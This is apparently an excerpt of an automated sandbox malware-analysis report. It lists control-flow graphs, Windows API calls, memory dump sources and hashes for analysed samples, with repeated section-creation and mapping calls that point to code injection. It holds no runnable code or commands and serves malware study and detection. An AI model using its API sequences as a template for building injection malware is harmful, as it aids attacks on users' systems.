• Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
• Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
• Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
• Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Control-flow Graph

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0051E89C
Memory Dump Source
• Source File: 00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_50c000_derhswe.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: a00d14364ddb63b9b723cee9d51e06b425e626dc490d8caec9912d3181ec6e16
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: A911FA79A00208EFDB01DF98C985E99BFF5AF08751F1580A4F9489B362D771EA90DB90

Control-flow Graph

APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000005.00000002.2044709796.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_derhswe.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
• Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
• Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
• Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
• Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 40.7%
Signature Coverage: 0%
Total number of Nodes: 118
Total number of Limit Nodes: 4

Control-flow Graph (function starting at 401514; interactive executed/not-executed basic-block graph not reproduced)
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Control-flow Graph (function starting at 4014fe; interactive executed/not-executed basic-block graph not reproduced)
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1652636561-0
                                                                                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Control-flow Graph (function starting at 401542; interactive executed/not-executed basic-block graph not reproduced)
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Control-flow Graph (function starting at 401549; interactive executed/not-executed basic-block graph not reproduced)
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Control-flow Graph (function starting at 401557; interactive executed/not-executed basic-block graph not reproduced)
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Control-flow Graph (function starting at 402f97; interactive executed/not-executed basic-block graph not reproduced)
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1921587553-0
                                                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Control-flow Graph (function starting at 52003c; interactive executed/not-executed basic-block graph not reproduced)
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0052024D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2106411331.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_520000_derhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: cess$kernel32.dll
                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction ID: 919b4ee4c9051b2d158f225995026eaa3ecd924755c0c65d7b99845caff89d7f
                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction Fuzzy Hash: 4C526A75A01229DFDB64CF58D984BA8BBB1BF09304F1480D9E54DAB392DB30AE85DF14

Control-flow Graph (function starting at 751a5c; interactive executed/not-executed basic-block graph not reproduced)
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00751A84
• Module32First.KERNEL32(00000000,00000224), ref: 00751AA4
Memory Dump Source
• Source File: 00000006.00000002.2106596720.000000000073F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0073F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_73f000_derhswe.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0

Control-flow Graph (image omitted): blocks 520e0f-520e2c; calls SetErrorMode * 2
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,00520223,?,?), ref: 00520E19
• SetErrorMode.KERNELBASE(00000000,?,?,00520223,?,?), ref: 00520E1E
Memory Dump Source
• Source File: 00000006.00000002.2106411331.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_520000_derhswe.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0

Control-flow Graph (image omitted): blocks 4018e6-4019a5; calls 401193, Sleep, 40141f, 401514
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0

Control-flow Graph (image omitted): blocks 4018c6-4019a5, entry 401915; calls 401193, Sleep, 40141f, 401514
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0

Control-flow Graph (image omitted): blocks 4018f1-4019a5; calls 401193, Sleep, 40141f, 401514
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0

Control-flow Graph (image omitted): blocks 401912-4019a5; calls 401193, Sleep, 40141f, 401514
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0

Control-flow Graph (image omitted): blocks 75171b-7517a3; calls 751a2e, VirtualAlloc, 7517a8
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0075176C
Memory Dump Source
• Source File: 00000006.00000002.2106596720.000000000073F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0073F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_73f000_derhswe.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0

Control-flow Graph (image omitted): blocks 401925-4019a5; calls 401193, Sleep, 40141f, 401514
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000006.00000002.2106132142.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_derhswe.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0

Execution Graph

Execution Coverage: 10.8%
Dynamic/Decrypted Code Coverage: 34.4%
Signature Coverage: 0%
Total number of Nodes: 151
Total number of Limit Nodes: 6

Control-flow Graph (image omitted): blocks 4014fb-4019dd; calls 40127e, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, 4017d0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                        • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                                                        • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                                                                        • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

Control-flow Graph

Control-flow graph (edge list omitted): basic blocks 4015fb-4019dd; calls sub_40127e, NtDuplicateObject, NtCreateSection (2x), NtMapViewOfSection (4x) and sub_4017d0.
APIs
• NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
Memory Dump Source
• Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
• Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
• Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
• Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

Control-flow Graph

Control-flow graph (edge list omitted): basic blocks 401613-4019dd; calls sub_40127e, NtDuplicateObject, NtCreateSection (2x), NtMapViewOfSection (4x) and sub_4017d0.
APIs
• NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
Memory Dump Source
• Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
• Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
• Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
• Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

Control-flow Graph

Control-flow graph (edge list omitted): basic blocks 401606-4019dd; calls sub_40127e, NtDuplicateObject, NtCreateSection (2x), NtMapViewOfSection (4x) and sub_4017d0.
APIs
• NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
Memory Dump Source
• Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectView
• String ID:
• API String ID: 1652636561-0
• Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
• Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
• Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
• Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

Control-flow Graph

Control-flow graph (edge list omitted): basic blocks 401627-4019dd; calls sub_40127e, NtDuplicateObject, NtCreateSection (2x), NtMapViewOfSection (4x) and sub_4017d0.
APIs
• NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
Memory Dump Source
• Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
• Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
• Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
• Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

Control-flow Graph

Control-flow graph (edge list omitted): basic blocks 401641-4019dd; calls sub_40127e, NtDuplicateObject, NtCreateSection (2x), NtMapViewOfSection (4x) and sub_4017d0.
APIs
• NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
Memory Dump Source
• Source File: 00000007.00000002.2263348545.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_1D0F.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
